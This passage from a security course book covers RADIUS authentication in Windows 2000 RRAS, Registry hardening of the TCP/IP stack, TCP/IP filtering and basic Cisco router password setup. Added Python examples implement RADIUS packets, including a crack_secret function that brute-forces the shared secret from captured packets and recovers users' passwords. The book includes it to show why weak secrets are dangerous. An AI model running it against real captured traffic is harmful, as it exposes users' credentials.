8. Observe that the registered UDP port number used for RADIUS authentication is 1812 (RADIUS accounting uses UDP 1813). Some older RADIUS servers still listen on the pre-standard ports 1645 and 1646, so if a production client cannot authenticate, check which ports the server actually uses.

9. Click OK.


10. Observe that there is a value of 30 under Initial Score. You can configure your RADIUS Client to send authentication requests to more than one RADIUS server. When there is more than one server to choose from, the server with the higher score is tried first. The scale runs from 0 to 30; RRAS lowers a server's score when it stops responding, so that requests fail over to the next server.

11. Click OK.

12. If you are prompted to restart RRAS, click OK; you will do this shortly anyway.

13. Perform the same sequence of steps to configure your RADIUS Client to communicate with a RADIUS Accounting provider.

14. Click OK. Acknowledge any information boxes regarding restarting the service.

15. In the left pane, right-click your computer name, and choose All Tasks→Restart.

16. After the Restarting process box closes, close the RRAS console.
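The exchange that now takes place between the RADIUS Client and the RADIUS Server over UDP 1812, as an added example that is not part of the course text: an RFC 2865 Access-Request built the way a NAS builds it, the server-side check and signed Access-Accept, and the client-side verification of the Response Authenticator. It uses PAP password hiding as the simplest case (MS-CHAP carries a challenge and response instead, but the shared secret plays the same role in the Response Authenticator). The final function shows why the classroom secret "secret" would be a problem anywhere else: a passive sniffer with both packets can test secret guesses offline and then unhide the password. The user name, password, NAS address and candidate secrets are constructed for the demonstration.

```python
"""RADIUS Access-Request/Access-Accept exchange per RFC 2865: added example,
not course code. User name, password, NAS address and secrets are constructed."""
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS = 1, 2, 4   # attribute types


def attr(atype, value):
    """Type-Length-Value attribute; Length counts the 2-byte header."""
    return struct.pack("!BB", atype, len(value) + 2) + value


def hide_password(password, secret, authenticator):
    """RFC 2865 5.2: pad to a 16-byte multiple, XOR each block with
    MD5(secret + previous ciphertext block), seeded with the Request Authenticator."""
    p = password + b"\0" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(p), 16):
        block = hashlib.md5(secret + prev).digest()
        prev = bytes(x ^ y for x, y in zip(p[i:i + 16], block))
        out += prev
    return out


def unhide_password(hidden, secret, authenticator):
    """Inverse of hide_password; anyone holding the secret can do this."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        block = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], block))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\0")


def build_packet(code, ident, authenticator, attrs):
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def parse_attrs(data):
    attrs, i = {}, 0
    while i < len(data):
        atype, length = data[i], data[i + 1]
        attrs[atype] = data[i + 2:i + length]
        i += length
    return attrs


def access_request(user, password, secret, nas_ip, ident=1, authenticator=None):
    """What the RADIUS Client (the RRAS dial-up server) sends to UDP 1812."""
    req_auth = authenticator or os.urandom(16)   # must be unpredictable in real use
    attrs = (attr(USER_NAME, user)
             + attr(USER_PASSWORD, hide_password(password, secret, req_auth))
             + attr(NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    return build_packet(ACCESS_REQUEST, ident, req_auth, attrs)


def response_authenticator(code, ident, length, request_auth, attrs, secret):
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(struct.pack("!BBH", code, ident, length)
                       + request_auth + attrs + secret).digest()


def server_handle(request, secret, users):
    """What the RADIUS Server (IAS) does: unhide, check against its user database,
    and sign the verdict with the shared secret."""
    code, ident, length = struct.unpack("!BBH", request[:4])
    req_auth, attrs = request[4:20], parse_attrs(request[20:length])
    password = unhide_password(attrs[USER_PASSWORD], secret, req_auth)
    verdict = ACCESS_ACCEPT if users.get(attrs[USER_NAME]) == password else ACCESS_REJECT
    return build_packet(verdict, ident,
                        response_authenticator(verdict, ident, 20, req_auth, b"", secret), b"")


def client_verify(reply, request, secret):
    """The RADIUS Client must recompute the Response Authenticator before it
    trusts an Accept; otherwise anyone who can spoof UDP could grant access."""
    code, ident, length = struct.unpack("!BBH", reply[:4])
    expected = response_authenticator(code, ident, length, request[4:20],
                                      reply[20:length], secret)
    return reply[4:20] == expected


def crack_secret(request, reply, candidates):
    """Passive attacker holding a capture of both packets: each candidate secret is
    tested offline against the Response Authenticator, and the right one also
    unhides the User-Password. Returns (secret, password) or None."""
    for guess in candidates:
        if client_verify(reply, request, guess):
            hidden = parse_attrs(request[20:])[USER_PASSWORD]
            return guess, unhide_password(hidden, guess, request[4:20])
    return None
```

Nothing in the protocol rate-limits the offline guessing in crack_secret, which is why the strength of the shared secret, and keeping the RADIUS traffic off networks an attacker can sniff, matter more than the choice between 1812 and 1645.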

Testing the Dialup Client

Now that all the necessary components for RADIUS are in place, you will test it. From the Dialup Client, you will make a call to the Dialup Server. Because you have configured this server for pass-through authentication, any authentication request received on the Dialup Server will be sent to the RADIUS Server. If authentication is approved, the Dialup Client will be able to connect, receive an IP address, and be part of the network.

TASK 4G-10 Testing the Dialup Client

Note: Perform this task only if you are designated as a Dialup Client.

1. In the Networking And Dial-up Connections Control Panel, double-click your dialup connection.

2. For the User Name and Password, enter the appropriate Raduser name (such as RaduserL1, depending on which student pair you’re part of) and aA123456, and click Connect. You should be authenticated by the RADIUS Server and connected to the RADIUS Client (which is your dialup server) in a few seconds.

3. Click OK to acknowledge the Connection Complete information box.

4. Verify your IP address by using the ipconfig /all command at a command prompt. When you connected to the RADIUS Client, you had a 192.168.16x.y or 192.168.18x.y address. You should now see a different address assigned to the dialup interface.


Because you logged on as RaduserX, an account that exists only on the Instructor Machine, only the RADIUS Server could have authenticated you. The RADIUS Client simply passed the authentication request on to the RADIUS Server and passed the approval back to the Dialup Client.

5. Close the command prompt.

Bringing Back the Network

Once you have tested the RADIUS configuration, you need to return the classroom configuration to the state it was in before you started the RADIUS tasks. The following quick task will walk you through what is required to bring the network back to normal status.

TASK 4G-11 Reconfiguring the Network

Note: Perform step 1 and step 2 only if you are designated as a Dialup Client.

1. If necessary, open the Networking And Dial-up Connections Control Panel. Right-click your dialup connection, and choose Disconnect.

2. Right-click and enable your network interfaces. Close all open windows.

Note: Perform step 3 and step 4 only if you are designated as a RADIUS Client.

3. Right-click My Network Places, and choose Properties.

4. Right-click and enable the Partner interface. Close all open windows.


Hardening TCP/IP

The TCP/IP stack in Windows is one of the most attacked components of personal computers. Common attacks include Denial of Service (DoS) attacks, Distributed Denial of Service (DDoS) attacks, spoofing, smurf, and Land attacks, just to name a few. There are some configurations that can be made to the Registry to harden the TCP/IP stack in Windows 2000. These configurations are recommended by Microsoft, are designed specifically to help defend against Denial of Service attacks, and should be another component of your layered defense.

The following settings can be configured in the Registry. Remember to be careful in the Registry, as errors in configuration can cause Windows to no longer function properly and could require a reinstall; export the key before you change it so that you can restore it. All of the following values are REG_DWORD values, which Regedit displays in hexadecimal unless noted otherwise, and all are found under this Registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

Syn Attack Defense

Configuring this value modifies how Windows retransmits SYN-ACKs, the second step of the TCP handshake that a SYN flood deliberately leaves unanswered. The result is a shorter timeout for half-open connections once a DoS attack is detected. To determine whether an attack is in progress, Windows compares the number of half-open connections against the following three values:

• TCPMaxPortsExhausted

• TCPMaxHalfOpen

• TCPMaxHalfOpenRetried

There are three options for this value. The specifics are defined as follows:

• Value Name: SynAttackProtect

• Key: Tcpip\Parameters

• Value Type: REG_DWORD

• Valid Range: 0, 1, 2

• Default Value: 0

A setting of 0 is the default, which Microsoft describes as typical protection against SYN attacks. A setting of 1 causes TCP to reduce the retransmission of SYN-ACKs, so that half-open connections time out more quickly during SYN attacks. A setting of 2 is the strongest protection: in addition to the behavior of 1, TCP delays notifying the listening application of a new connection until the three-way handshake has completed, so that half-open connections consume fewer resources. From a security perspective, a setting of 2 is recommended. Microsoft documents that setting 2 also disables the scalable-windows (RFC 1323) option, which can reduce throughput on high-latency links, so test before deploying it on a busy server.

Dead Gateway

Multiple gateways can be configured in the settings of TCP/IP. You can, however, disable dead-gateway detection, because a Denial of Service (or other) attack that makes the primary gateway appear unresponsive can cause your machine to switch to a backup gateway, potentially an unintended one. The specifics for this are defined as follows:

• Value Name: EnableDeadGWDetect

• Key: Tcpip\Parameters

• Value Type: REG_DWORD

• Valid Range: 0 (False), 1 (True)

• Default Value: 1 (True)

Hardening the TCP/IP Stack

Denial of Service: Action(s) which prevent any part of an automated information system (AIS) from functioning in accordance with its intended purpose.

smurfing: A denial of service attack in which an attacker spoofs the source address of an echo-request ICMP (ping) packet to the broadcast address for a network, causing the machines in the network to respond en masse to the victim.


A setting of 1 allows TCP to perform dead-gateway detection and change to a backup gateway. A setting of 0 disables this function. From a security perspective, a setting of 0 is recommended.

MTU Restrictions

Attackers can use the Maximum Transmission Unit to force a host to use very small segments. With Path MTU Discovery, TCP tries to identify the largest packet size that a path to a remote host will accommodate, by honoring the ICMP Fragmentation Needed messages it receives. When those messages are spoofed, the host can be tricked into sending tiny segments and flooding the network with them. The specifics for adjusting this value are defined as follows:

• Value Name: EnablePMTUDiscovery

• Key: Tcpip\Parameters

• Value Type: REG_DWORD

• Valid Range: 0 (False), 1 (True)

• Default Value: 1 (True)

A setting of 1 allows TCP to discover the largest segment size to a remote host. A setting of 0 fixes the MTU at 576 bytes for all communication with hosts not on the local subnet. Communication with local hosts still uses the largest segment size; only remote host communication is affected. From a security perspective, a setting of 0 is recommended, at the cost of some efficiency on paths that could carry larger packets.

Keep Alive

By default, Windows TCP does not verify idle connections unless the application has enabled keep-alives on its socket (the SO_KEEPALIVE option). It is recommended that idle connections be verified, using third-party software if the application does not enable keep-alives itself, by sending a keep-alive packet and waiting for the response. If there is no response, the idle connection can be closed rather than left open for an attacker to hold. KeepAliveTime controls how long a connection stays idle before the first keep-alive is sent on sockets that have the option enabled. The specifics for adjusting this value are defined as follows:

• Value Name: KeepAliveTime

• Key: Tcpip\Parameters

• Value Type: REG_DWORD (The value is in milliseconds)

• Valid Range: 1-0xFFFFFFFF

• Default Value: 7,200,000 (two hours)

The recommended setting for this value is 300,000, which is five minutes.

TASK 4G-12 Configuring TCP/IP in the Registry

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

Note: This task should be performed by all students.

1. Open a Registry Editor.

2. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

3. Open the Tcpip\Parameters key.


4. In the right pane, right-click and add the following REG_DWORD values:

a. SynAttackProtect

b. EnableDeadGWDetect

c. EnablePMTUDiscovery

d. KeepAliveTime

5. Double-click SynAttackProtect, and enter a value of 2.

6. Double-click EnableDeadGWDetect, and enter a value of 0.

7. Double-click EnablePMTUDiscovery, and enter a value of 0.

8. Double-click KeepAliveTime, and enter a decimal value of 300,000. In hex notation, this is 493E0.

9. Close the Registry Editor.
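A way to check that the four values from the text are actually in place on a fleet, as an added example rather than anything from the course: it parses the text that Regedit's Export (or reg export) writes for the Tcpip\Parameters key, reports each value as OK, WRONG or MISSING (missing means the Windows 2000 default still applies), and emits a .reg fragment that corrects the non-compliant ones. The recommended and default values are the ones stated above; the export below is constructed, and it assumes the key path and value names exactly as the task gives them.

```python
r"""Audit an exported Tcpip\Parameters key against the hardening values above.
Added example, not course code. The sample export is constructed."""
import re

KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"

# Recommended values from the text, with the Windows 2000 default that applies when absent.
RECOMMENDED = {
    "SynAttackProtect":    {"want": 2,      "default": 0},
    "EnableDeadGWDetect":  {"want": 0,      "default": 1},
    "EnablePMTUDiscovery": {"want": 0,      "default": 1},
    "KeepAliveTime":       {"want": 300000, "default": 7200000},
}

# Constructed export: one value correct, one wrong, one missing, plus an unrelated value.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SynAttackProtect"=dword:00000002
"EnableDeadGWDetect"=dword:00000001
"KeepAliveTime"=dword:000493e0
"DataBasePath"=hex(2):25,00,53,00
"""

_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg export.
    Other value kinds (hex, string) are skipped; the header line is ignored."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = _DWORD_RE.match(line)
            if m:
                keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit(text, key=KEY, recommended=RECOMMENDED):
    """Return {value_name: (status, effective_value)} where status is OK, WRONG or MISSING."""
    values = parse_reg_export(text).get(key, {})
    report = {}
    for name, spec in recommended.items():
        if name not in values:
            report[name] = ("MISSING", spec["default"])   # default is what the stack uses
        elif values[name] == spec["want"]:
            report[name] = ("OK", values[name])
        else:
            report[name] = ("WRONG", values[name])
    return report


def to_reg_fix(report, key=KEY, recommended=RECOMMENDED):
    """Emit a .reg fragment that sets every non-OK value to the recommended one."""
    lines = ["Windows Registry Editor Version 5.00", "", f"[{key}]"]
    for name, (status, _) in report.items():
        if status != "OK":
            lines.append(f'"{name}"=dword:{recommended[name]["want"]:08x}')
    return "\n".join(lines) + "\n"
```

Regedit writes Version 5.00 exports as UTF-16 with a byte-order mark, so read a real file with encoding "utf-16" before passing it to audit(); the returned fix can be applied with regedit /s after a reboot has been scheduled, since the TCP/IP stack reads these values at start-up.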

TCP/IP Filtering

Another built-in Windows 2000 feature that you can add to your layered defense is TCP/IP filtering. TCP/IP filtering is a method of controlling inbound network access to a host. TCP/IP filtering is independent of other processes, such as IPSec, and other services, such as the Server and Workstation services. To control outbound access, you need to implement Routing And Remote Access filters.

When you are configuring filtering, you have the option to control access to TCP ports, to UDP ports, and to specific IP protocols. Each access point is controlled by its numerical value. In other words, you control port access by the port number, such as 80 for WWW access. To control an entire protocol, use the IP protocol number. The following table lists, for quick reference, several common IP protocol numbers to use in filtering.

Protocol Number   Protocol Acronym   Full Name of Protocol
1                 ICMP               Internet Control Message Protocol
6                 TCP                Transmission Control Protocol
17                UDP                User Datagram Protocol

When you enable TCP/IP filtering on one interface, it is enabled on all interfaces; however, you must configure the specific filters on a per-interface basis. When you are configuring the port filters, the options are to permit all ports or to define the ports that are to be allowed. Remember that this configures inbound ports, not outbound. The system does not filter responses to requests initiated by the host, so you do not need to open high ports for network responses.

Finally, if you want to filter protocols, be aware that you cannot block ICMP messages with this feature. This is the case even if you exclude IP protocol 1 from the allowed protocol list; if ICMP must be blocked, use an IPSec policy or Routing And Remote Access filters instead. A simple way to block all inbound TCP traffic, for example, is to select the option to permit only the listed TCP ports, but not add any ports to the list.
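The decision rules just described, as an added example that is not part of the course text, written so the edge cases can be checked rather than remembered: ICMP passes regardless of the protocol list, a permit-only TCP list with no entries blocks all inbound TCP, and replies to connections this host opened are not filtered. The policy object mirrors the one configured in the next task; the packets are constructed, and the model covers only what the text states about the feature.

```python
"""Inbound decision rules of Windows 2000 TCP/IP filtering as the text describes
them: added example, not course code. Packets below are constructed."""
from dataclasses import dataclass
from typing import Optional, Set

ICMP, TCP, UDP = 1, 6, 17


@dataclass
class FilterPolicy:
    """None means 'Permit All' for that list; a set means 'Permit Only' those numbers."""
    tcp_ports: Optional[Set[int]] = None
    udp_ports: Optional[Set[int]] = None
    protocols: Optional[Set[int]] = None


@dataclass
class Inbound:
    protocol: int
    dport: int = 0
    solicited: bool = False   # reply to a request this host initiated


def inbound_allowed(pkt, policy):
    """True if the packet reaches the host under the given filter settings."""
    if pkt.solicited:            # filtering applies to unsolicited inbound traffic only
        return True
    if pkt.protocol == ICMP:     # cannot be blocked by TCP/IP filtering
        return True
    if policy.protocols is not None and pkt.protocol not in policy.protocols:
        return False
    if pkt.protocol == TCP and policy.tcp_ports is not None:
        return pkt.dport in policy.tcp_ports
    if pkt.protocol == UDP and policy.udp_ports is not None:
        return pkt.dport in policy.udp_ports
    return True


# The policy from the next task: only these TCP ports, all UDP ports, protocols 6 and 17.
TASK_POLICY = FilterPolicy(tcp_ports={20, 21, 23, 25, 80, 110, 443},
                           udp_ports=None, protocols={TCP, UDP})

# "Permit Only" with an empty TCP list: the trick the text gives for blocking all TCP.
NO_TCP_POLICY = FilterPolicy(tcp_ports=set(), udp_ports=None, protocols={TCP, UDP})


def evaluate(policy, packets):
    """Return {label: allowed} for a batch of labelled packets."""
    return {label: inbound_allowed(pkt, policy) for label, pkt in packets.items()}


# Constructed sample traffic, labelled by what it represents.
SAMPLE = {
    "http":        Inbound(TCP, 80),
    "smb_445":     Inbound(TCP, 445),
    "dns_udp":     Inbound(UDP, 53),
    "ping":        Inbound(ICMP),
    "gre":         Inbound(47),
    "reply_to_us": Inbound(TCP, 3456, solicited=True),
}
```

Running evaluate(TASK_POLICY, SAMPLE) shows the practical gap: SMB on 445 and GRE are dropped, but pings still get through, so a smurf-style flood has to be handled elsewhere in the layered defense.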


TASK 4G-13 Configuring Port and Protocol Filtering

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Navigate to the Properties for the Classroom Hub interface.

2. Scroll to and select Internet Protocol (TCP/IP), and then click Properties.

3. Click the Advanced button.

4. Display the Options tab.

5. Select TCP/IP Filtering, and click Properties.

6. Check Enable TCP/IP Filtering.

7. Permit only the following TCP ports: 20, 21, 23, 25, 80, 110, and 443.

8. Permit only the following protocols: 6 and 17.

9. Click OK to implement your filtering.

10. Click OK to close the Advanced TCP/IP Properties.

11. Click OK twice to close the TCP/IP and Interface Properties.

12. When you are prompted to restart the server, click No. To fully implement your changes, you would have to restart the server; however, for the purposes of this class, we need to have all ports and protocols available.

13. Go back and revert to the unfiltered settings to allow the remainder of the tasks to function with no restrictions.

14. This time, restart your computer when you are prompted to. Then, log on as the renamed Administrator account and verify that the TCP/IP settings are correct.

15. Close all open windows.


Summary

In this lesson, you were introduced to the fundamental issues of securing Windows 2000 computers and resources. You configured GPOs for the security of the infrastructure, described the process of local logon on Windows 2000, and implemented security tools, including secedit.exe and the Security Configuration And Analysis snap-in. You then configured logging options, focusing on the Security Log, and implemented local encryption by using EFS. Finally, you examined methods of securing network communications and how to harden the TCP/IP stack in Windows 2000.

Lesson Review

4A What are the new components of Windows networking that are introduced with Windows 2000?

Answers will vary; however, some of the components are: Active Directory, trees, forests, Organizational Units, and Group Policy Objects.

Place the following GPOs in the order that they are processed.

Site: 2

Local: 1

OU: 4

Domain: 3

(The processing order is Local, Site, Domain, OU, so the OU policy applied last wins any conflict.)

4B What are some of the authentication methods Windows 2000 supports?

Kerberos, NTLM, RADIUS, SSL, and Smart Cards.

What is the name of the component of the Windows 2000 architecture that makes the method of authentication transparent to an application developer?

Security Support Provider Interface (SSPI).

In Kerberos, you can implement Single Sign On (SSO) so that a user needs to enter their logon credentials only once to access all network services.

4C What are the three tools introduced in this topic for managing the security of the Windows 2000 network?

The secedit.exe tool, security templates, and the Security Configuration And Analysis snap-in.

What are the four basic levels for security templates?

Basic, compatible, secure, and highly secure.


If you want to secure an IIS 5.0 server, which template should you implement?

The hisecweb.inf template.

4D What are the three file systems discussed in this topic that are supported by Windows 2000?

FAT, FAT32, and NTFS.

How can you prevent subfolders from inheriting permissions from their parent folders?

Have the parent security permissions applied To This Folder Only.

What are the three levels of permission that can be granted to secure printers?

Print, Manage Printers, and Manage Documents.

4E What command would you use to have an audit policy take effect immediately on the local machine?

The secedit /refreshpolicy machine_policy command.

What is the Event ID of a successful network logon event?

540.

What is the Logon Type of an Interactive Logon?

Logon Type 2.

4F In EFS, what is used to perform the encryption?

The File Encryption Key (FEK).

What is the encryption algorithm used by EFS?

DES.

Do users require an Administrator to enable EFS on their systems?

No. EFS is enabled by default, and a user can implement it without the Administrator being involved, unless there is a policy implemented that prevents it from being used.

4G Which hive will you use if you want to make changes to the TCP/IP stack operation in a Windows 2000 computer?

HKEY_LOCAL_MACHINE.

How can you configure TCP/IP filtering on a Windows 2000 Server to filter outbound access?

You cannot. TCP/IP filtering in Windows 2000 is designed to filter inbound access only.


LESSON 5
Routers and Access Control Lists

Overview
In this lesson, you will be introduced to the functioning of routers and routing protocols. The examples in this lesson are shown on Cisco routers, specifically the 2500 series. You will examine the issues of securing routers and routing protocols. You will remove unneeded services and create access control lists to manage and secure the network. The lesson ends with the creation of logging options on the Cisco router.

Objectives
In this lesson, you will:

5A Configure fundamental router security.

You will create the required configurations to secure connections, create banners, and implement SSH.

5B Examine principles of routing.

You will capture routing protocols and analyze the IP and MAC relationship in a routed environment.

5C Configure the removal of services and protocols.

You will create the required configurations to harden the core services and protocols on a Cisco router.

5D Examine the function of Access Control Lists on a Cisco router.

You will create wildcard masks to be used in conjunction with the implementation of Access Control Lists.

5E Implement Cisco Access Control Lists.

You will create the required configurations to implement Access Control Lists to defend against network attacks on a Cisco router.

5F Configure logging on a Cisco router.

You will create the required configurations to enable logging on a Cisco router.

Data Files
ping-arp-mac.cap
rip update.cap
ripv2withAuthentication.cap

Lesson Time
6 hours


Topic 5A
Fundamental Cisco Security
Although this lesson is not designed to make you a Cisco or a routing expert, you will become familiar with the core functions of routers and how to best harden this critical component of the infrastructure.

Cisco Router Language
A Cisco router has one or more connections to networks. Each of these connections is referred to as an interface. To further define this interface concept, Cisco uses the type of interface as part of the name as well. Therefore:

• An interface that is connected to an Ethernet segment of the network always starts with an E.

• A Fast Ethernet interface always starts with an F.

• An interface that is connected to a serial connection always starts with an S.

• An interface that is connected to a Token Ring segment always starts with To.

Along with the interface type, Cisco interfaces are numbered. The interface numbering begins with a zero. In other words:

• The first Ethernet interface on the router is known as E0.

• Likewise, the first serial interface on the router is S0.

• Finally, the first Token Ring interface on the router is To0.

Cisco Operating System
The Cisco routers do have their own operating system, which is known as the IOS (Internetworking Operating System). The IOS is found on all Cisco routers and can be uploaded to or downloaded from a tftp site. It is common to copy the IOS image to the tftp location as a quick backup in the event that the running IOS gets corrupted.

Most of the current routers in production are running versions 11.x or 12.x of the Cisco IOS. When Cisco makes a major release of the IOS, it is assigned a number, such as 11 or 12. A minor number can be added to the major release, such as 11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in parentheses is the third maintenance revision of the major release. Maintenance revisions are released every eight weeks and contain bug fixes and/or updates, as Cisco dictates.

Cisco Router Terminology

bug: An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.


Accessing the Router
Cisco provides a wide variety of access points for their routers. Each method of access can provide the ability to view the router differently. Some methods require the network to be functioning and active, while others do not require any network connectivity at all. The methods of access include the console port, the auxiliary port, or network access. Network access can, in turn, include VTY (terminal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here:

• The console port is the main point of access on a Cisco router. This is a direct physical connection, requiring the router to be in the presence of the person using the port. This is the connection method used to create the initial configuration and in the event of an emergency, such as password recovery. Because it requires direct physical access, the console port should not be the primary method of accessing the router.

• The auxiliary port can be used to connect to the router via a modem. This can be a functional method of accessing the router if the primary network is down and you are not able to gain physical access to the router.

• The VTY sessions provide for terminal access to the router. These connections require the network to be functioning to provide access. The most common method of accessing a VTY session is telnet, although—for security purposes—SSH is supported, and is recommended. There are five VTY ports on the router by default, and they are numbered 0 through 4. In this course, access will be provided by using VTY sessions.

• Other network access points like HTTP, TFTP, and SNMP are also supported on newer versions of the IOS. HTTP can be used if the router runs as a Web server, authenticating users for access. TFTP is used for loading IOS and configuration files, and SNMP can be used in full network management configurations.

Modes of Operation
In the router, there are several different modes an administrator can use. These range from simple, informational modes, to the complex modes of router configuration. Several examples of the different modes are listed below:

• User Mode—In this mode, users can see the configuration of the router, but will not be able to make any significant changes to the router. The prompt for User Mode looks like this: Router>.

• Enable Mode—In this mode, users can make more significant changes to the router, including some of the router configuration options. The prompt for Enable Mode looks like this: Router#.

• Global Configuration Mode (also known as Configure Terminal Mode)—In this mode, users can make configuration changes that will affect the entire router. The prompt for Global Mode looks like this: Router(config)#.

Generally, once you connect to the router, you will move to Enable Mode right away, since that is where much of the router management happens. As a side note, Enable Mode is often called Privileged Mode in text. So, you can consider Enable Mode and Privileged Mode to mean the same thing—the next level of router access beyond User Mode.

Ways to Access the Router

SNMP: (Simple Network Management Protocol) Software used to control network communications devices using TCP/IP.

Operating Modes


Configuration Fragments
In this lesson, you will see many examples of configurations of the router. It is not practical to list every step and every line entered for every option. Therefore, what you will see are called configuration fragments.

For example, to navigate to Interface Mode on a router, the following commands are required:

1. Connect to the router via an access method, such as telnet: Telnet 10.10.10.10

2. Enter the password for VTY access: L3tm3!n

3. Enter the password for Enable Mode: P0w3r

4. Enter the command for Configure Terminal Mode: Configure Terminal

5. Enter the command for Interface Mode: Interface Ethernet 0

In this course, the command sequence listed previously will not be described line by line but with a configuration fragment. So, the steps to access Interface Mode will look like this:

1. Router#Config Terminal

2. Router(Config)#Interface Ethernet0

This configuration fragment goes right to the concept, or function, of the discussion. In this example, you cannot be in Enable Mode (identified by the Router# prompt) without first accessing the router (probably by using Telnet) and entering the required credentials.

Navigating in the Router
The Cisco router interface is a command-line interface, with a format that is similar to UNIX. For those of you getting started with the router, if you get lost in the command structure, here are some of the more common commands to learn and use.

• First is the question mark (?).

— This simple single-character command will list for you all the available options at a given point in the router. For example, if you enter the question mark at the User Mode prompt, like so: Router>?, you will be given an alphabetical list of the commands that are options at this point. This command will yield a different set of commands than using the same question mark at the Enable Mode prompt (Router#?).

— If you recall the first letter of a command, but not the entire string, again the question mark can come in handy. For example, if you are trying to enter Enable Mode, but forgot how to spell enable, you can use the following command: Router>E? This command lists all the commands starting with the letter E with brief descriptions of their functions.

• Other shortcuts to use are the Up Arrow and Down Arrow keys. Using these will scroll you through commands you have entered into the router for quick access.

• Finally, using key combinations can be helpful as well. Two examples of key combinations are Ctrl+A and Ctrl+E.

— Using the Ctrl+A key combination moves the cursor to the beginning of a command line.

Navigation


— Using the Ctrl+E key combination moves the cursor to the end of a command line.

As an FYI, if the Up Arrow and Down Arrow keys do not function on your system, you can use the key combination Ctrl+P in place of the Up Arrow key, and Ctrl+N in place of the Down Arrow key.

Authentication and Authorization
In order for someone to have access to control a router, there must be both authentication and authorization. It is important not to confuse these two, as they are so similar. Authentication is the process of identifying a user, generally granting or denying access. Authorization is the process of defining what a user can do or is authorized to do. So, a user gains access to the router via authentication and gains control of the router via authorization.

In Cisco routers, there are two main categories of authentication. They are the AAA method and the non-AAA method (called traditional by some). AAA stands for Authentication, Authorization, and Accounting.

• Earlier, you were introduced to the methods of access, such as console, auxiliary, and VTY sessions. These are considered non-AAA access methods. Another non-AAA access method is called Terminal Access Controller Access Control System, or TACACS for short. They use a local username and password for authentication.

• AAA methods include RADIUS and Kerberos. These methods provide for the full level of Authentication, Authorization, and Accounting that are required for AAA access methods.

Configuring Access Passwords
Because there are several different methods of accessing the router, in order to provide security, you must be able to lock down these access points. The first line of defense is to provide a password for these forms of access.

Setting the Console Password
Because the console-port connection is used for direct access, it must have a strong password. This can be, and usually is, created during the initial setup of the router. In order to set the Console password, you will need to enter Configure Terminal Mode, and then enter the command line console 0. This is what gets you into the mode where the password can be created. The login command tells the router that a password is required, and the password command is used to enter the actual password. The configuration fragment looks like this:

Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Configuring Access Passwords


Setting the Enable Passwords
The process for setting the Enable password is similar to the process for setting the Console password. And, you will notice the processes for the following sections are all similar; only the object (such as the console or vty) is different.

As to the password itself, there are two different Enable passwords. The first is the standard Enable password; the second is the Enable Secret password. The standard Enable password is used only for backwards compatibility. If the Enable Secret password has been configured, it will take precedence. The reason that the Enable Secret password is used over the standard Enable password is that the Enable Secret password is encrypted and cannot be read in plaintext in the router. The configuration fragment for setting the Enable Secret password looks like this:

Router#config terminal
Router(config)#enable secret p@55w0rd
Router(config)#^Z
Router#

Setting the VTY Password
Configuration of the password for the VTY sessions is similar to creating the Console password. Remember that there are five VTY sessions, numbered 0 through 4. When you are setting the VTY password, you can create a password for one or for all of these sessions. In this first configuration fragment, the password is set for just the first VTY session:

Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

In the following configuration fragment, the password is set for all VTY sessions, 0 through 4. Note that the process is nearly identical.

Router#config terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#


TASK 5A-1
Configuring Passwords

1. Create the configuration fragment that you would use to set the Console password of ACC3$$, and to set all VTY sessions to use the password of +3ln3+.

Router#configure terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password ACC3$$
Router(config-line)#^Z
Router#
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password +3ln3+
Router(config-line)#^Z
Router#

Creating User Accounts
Although individual user accounts are not required for regular operation of the router, when you do add them, it allows for another level of control over the router and over router access.

To create local user accounts, the command syntax is only one line. In organizations where there are multiple people managing the router, this is a solid practice. The following configuration fragment shows the creation of several user accounts:

Router#configure terminal
Router(config)#username Auser password u$3r1
Router(config)#username Buser password u$3r2
Router(config)#username Cuser password u$3r3
Router(config)#username Duser password u$3r4
Router(config)#^Z
Router#

Implementing Banners
In addition to having proper passwords on the router, it is important to have adequate warning banners. It is highly recommended that you view these banners as warning banners and not as welcome banners, as they used to be called. A warning banner is not designed to be the end-all of security; most people know a banner will not stop a determined attacker. However, a banner can provide some legal backing for you and your organization.

Configuring Banners


There are four general functions that warning banners should provide. Although you should look to professional legal counsel for the exact wording, your banner should address each of these. The banner should:

• Not provide useful technical or non-technical information that an attacker can use.

• Inform users of the system(s) that their actions are subject to recording, and may be used in a court of law.

